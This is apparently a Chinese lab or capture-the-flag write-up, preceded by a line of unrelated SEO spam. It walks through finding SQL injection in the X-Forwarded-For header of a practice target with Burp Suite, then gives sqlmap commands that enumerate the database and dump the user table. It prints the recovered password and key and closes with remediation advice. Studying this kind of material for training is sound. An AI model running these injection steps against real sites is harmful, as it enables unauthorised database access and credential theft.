单仁网站建设,上海营销型企业网站,开发个网站多少钱,欧美视频在线电影0x00环境介绍
靶机http://219.153.49.228:48033,通过注入完成找到网站的key。 1|00x01复现过程
1.访问网站使用admin/admin登入#xff0c;用burpsuite截包寻找注入点
截到的包#xff0c;正常放包回显内容 加X-forwarded-for:1.1.1.1回显IP数据改变…0x00环境介绍
靶机http://219.153.49.228:48033,通过注入完成找到网站的key。 1|00x01复现过程
1.访问网站使用admin/admin登入用burpsuite截包寻找注入点
截到的包正常放包回显内容 加X-forwarded-for:1.1.1.1回显IP数据改变可能存在注入点 2.保存post包进行sql注入
保存post包1.txt加上X-forwarded-for:*作为注入点在windows上使用sqlmap跑
暴库python sqlmap.py -r 1.txt --dbs –batch
开始试了很多次payload也换了几个了没成功后来发现请求头和请求体没有分开。
修改后
a.暴数据库
python sqlmap.py -r 1.txt --dbs b.暴数据表
python sqlmap.py -r 1.txt -D webcalendar --tables c.暴列表
python sqlmap.py -r 1.txt -D webcalendar -T user --columns d.暴字段
python sqlmap.py -r 1.txt -D webcalendar -T user “password” --dumps 3.使用admin/116012900登入拿到keymozhebb8300a328e13dd2abd55c5d8dd 1|10x02修复建议
(1)程序代码里的所有查询语句使用标准化的数据库查询语句API接口设定语句的参数进行过滤一些非法的字符防止用户输入恶意的字符传入到数据库中执行sql语句。
(2)对用户提交的的参数安全过滤像一些特殊的字符*……%#等等进行字符转义操作,以及编码的安全转换。
(3)网站的代码层编码尽量统一建议使用utf8编码如果代码里的编码都不一样会导致一些过滤被直接绕过。
(4)网站的数据类型必须确定是数字型就是数字型字符型就是字符型数据库里的存储字段类型也设置为ini型。
(5)对用户的操作权限进行安全限制普通用户只给普通权限管理员后台的操作权限要放开尽量减少对数据库的恶意攻击。
(6)网站的报错信息尽量不要返回给客户端比如一些字符错误数据库的报错信息尽可能的防止泄露给客户端。 1|20x03总结思考 首先通过回显页面异常找到对应的注入点将post文件保存然后使用sqlmap跑post包另外请求体和请求头一定要分开。
